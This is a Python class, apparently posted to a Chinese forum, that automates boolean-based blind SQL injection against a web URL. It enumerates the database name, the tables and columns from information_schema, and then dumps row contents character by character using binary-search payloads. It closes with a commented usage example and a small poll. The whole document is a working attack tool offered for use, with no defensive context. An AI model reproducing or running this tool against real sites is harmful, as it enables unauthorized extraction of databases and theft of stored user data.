class BoolInject:
def __init__(self, url, flag):
self.url = url
self.req = requests.session()
self.flag = flag
def db(self):
name = ''
name_length = 0
# 库长度
payload = 'length(database())={num}'
url = self.url.replace('*', payload)
for i in range(1, 50):
r = self.req.get(url.format(num=i))
if r.status_code == 200 and r.text.find(self.flag) != -1:
name_length = i
break
if name_length == 0:
return
else:
print('database name length: %s' % name_length)
# 库名
payload = 'ascii(substr(database(),{len},1))>{ascii}'
url = self.url.replace('*', payload)
for n in range(1, name_length + 1):
max = 126
min = 32
while abs(max - min) > 1:
mid = int((max + min) / 2)
r = self.req.get(url.format(len=n, ascii=mid))
if r.status_code == 200 and r.text.find(self.flag) != -1:
min = mid
else:
max = mid
name += chr(max)
print("database name: %s" % name)
return name
# #所有库()
# def dbs(self):
# dbs = []
# db_count = 0
# # 库数量
# payload = "(select count(SCHEMA_NAME) from information_schema.schemata)={num}"
# url = self.url.replace('*', payload)
# for i in range(1, 100):
# print(url.format(num=i))
# r = self.req.get(url.format(num=i))
# if r.status_code == 200 and r.text.find(self.flag) != -1:
# db_count = i
# break
# if db_count:
# print('tables count: %s' % db_count)
# else:
# return
# pass
def tables(self, db):
tables = []
tables_count = 0
# 表数量
payload = "(select count(table_name) from information_schema.tables where table_schema='{db}')={num}"
url = self.url.replace('*', payload)
for i in range(1, 100):
r = self.req.get(url.format(num=i, db=db))
if r.status_code == 200 and r.text.find(self.flag) != -1:
tables_count = i
break
if tables_count == 0:
return
else:
print('tables count: %s' % tables_count)
# 表
for table_count in range(0, tables_count):
table_name = ''
tables_length = 0
# 表长度
payload = "length(substr((select table_name from information_schema.tables where table_schema='{db}' limit {count},1),1))={num}"
url = self.url.replace('*', payload)
for i in range(1, 100):
r = self.req.get(url.format(db=db, count=table_count, num=i))
if r.status_code == 200 and r.text.find(self.flag) != -1:
tables_length = i
if tables_length == 0:
print('table %s: 获取长度失败' % table_count)
continue
else:
print('table %s: 长度%s' % (table_count, tables_length))
# 表名
payload = "ascii(substr((select table_name from information_schema.tables where table_schema='{db}' limit {count},1),{len},1))>{ascii}"
url = self.url.replace('*', payload)
for i in range(1, tables_length + 1):
max = 126
min = 32
while abs(max - min) > 1:
mid = int((max + min) / 2)
r = self.req.get(url.format(db=db, count=table_count, len=i, ascii=mid))
if r.status_code == 200 and r.text.find(self.flag) != -1:
min = mid
else:
max = mid
table_name += chr(max)
print('table %s: %s' % (table_count, table_name))
tables.append(table_name)
return tables
def columns(self, db, table):
columns_name = []
columns_count = 8
# 列数量
payload = "(select count(column_name) from information_schema.columns where table_name='{table}' and TABLE_SCHEMA='{db}')={num}"
url = self.url.replace('*', payload)
for i in range(1, 50):
r = self.req.get(url.format(db=db, table=table, num=i))
if r.status_code == 200 and r.text.find(self.flag) != -1:
columns_count = i
if columns_count == 0:
return
else:
print('columns count: %s' % columns_count)
# 列
for column_count in range(0, columns_count):
column_name = ''
column_length = 0
# 列长度
payload = "length(substr((select column_name from information_schema.columns where TABLE_SCHEMA='{db}' and table_name='{table}' limit {count},1),1))={num}"
url = self.url.replace('*', payload)
for i in range(1, 100):
r = self.req.get(url.format(db=db, table=table, count=column_count, num=i))
if r.status_code == 200 and r.text.find(self.flag) != -1:
column_length = i
if column_length == 0:
print('table %s column %s: 获取列长度失败' % (table, column_count))
continue
else:
print('table %s column %s: 长度%s' % (table, column_count, column_length))
# 列名
payload = "ascii(substr((select column_name from information_schema.columns where TABLE_SCHEMA='{db}' and table_name='{table}' limit {count},1),{len},1))>{ascii}"
url = self.url.replace('*', payload)
for i in range(1, column_length + 1):
max = 126
min = 32
while abs(max - min) > 1:
mid = int((max + min) / 2)
r = self.req.get(url.format(db=db, table=table, count=column_count, len=i, ascii=mid))
if r.status_code == 200 and r.text.find(self.flag) != -1:
min = mid
else:
max = mid
column_name += chr(max)
print('table %s column %s: %s' % (table, column_count, column_name))
columns_name.append(column_name)
return columns_name
# columns: list
def dump(self, db, table, columns):
data = []
data_count = ''
# 数据量
data_count_str_length = 0
payload = "(select length(concat(count(*))) from {db}.{table})={len}"
url = self.url.replace('*', payload)
for i in range(1, 10):
r = self.req.get(url.format(db=db, table=table, len=i))
if r.status_code == 200 and r.text.find(self.flag) != -1:
data_count_str_length = i
payload = "ascii(substr((select concat(count(*)) from {db}.{table}), {len}, 1))>{ascii}"
url = self.url.replace('*', payload)
for i in range(1, data_count_str_length + 1):
max = 126
min = 32
while abs(max - min) > 1:
mid = int((max + min) / 2)
r = self.req.get(
url.format(db=db, table=table, len=i, ascii=mid))
if r.status_code == 200 and r.text.find(self.flag) != -1:
min = mid
else:
max = mid
data_count += chr(max)
if data_count:
print("table %s: 共%s条数据" % (table, data_count))
else:
print("table %s: 无数据" % table)
return
# 查
for data_row_num in range(0, int(data_count)):
data_row = {}
for column in columns:
# {column}数据{data_row_num}长度
row_length = ''
row_str_length = 0
payload = "(select length(concat(length({column}))) from {db}.{table} limit {row},1)={len}"
url = self.url.replace('*', payload)
for i in range(1, 10):
r = self.req.get(url.format(column=column, db=db, table=table, len=i, row=data_row_num))
if r.status_code == 200 and r.text.find(self.flag) != -1:
row_str_length = i
payload = "ascii(substr((select concat(length({column})) from {db}.{table} limit {row},1), {len}, 1))>{ascii}"
url = self.url.replace('*', payload)
for i in range(1, row_str_length + 1):
max = 126
min = 32
while abs(max - min) > 1:
mid = int((max + min) / 2)
r = self.req.get(
url.format(column=column, db=db, table=table, len=i, row=data_row_num, ascii=mid))
if r.status_code == 200 and r.text.find(self.flag) != -1:
min = mid
else:
max = mid
row_length += chr(max)
if not row_length:
data_row[column] = ''
continue
# 猜解数据
payload = "ascii(substr((select concat({column}) from {db}.{table} limit {row},1), {len}, 1))>{ascii}"
url = self.url.replace('*', payload)
for l in range(1, int(row_length) + 1):
max = 126
min = 32
while abs(max - min) > 1:
mid = int((max + min) / 2)
r = self.req.get(
url.format(column=column, db=db, table=table, len=l, row=data_row_num, ascii=mid))
if r.status_code == 200 and r.text.find(self.flag) != -1:
min = mid
else:
max = mid
if data_row.get(column):
data_row[column] += chr(max)
else:
data_row[column] = chr(max)
print('%s.%s %s: %s' % (table, column, data_row_num, data_row[column]))
data.append(data_row)
return data
# c = BoolInject('http://url/*sql', '正确返回字符串')
# c.db()
- 通过
- 未通过
0 投票者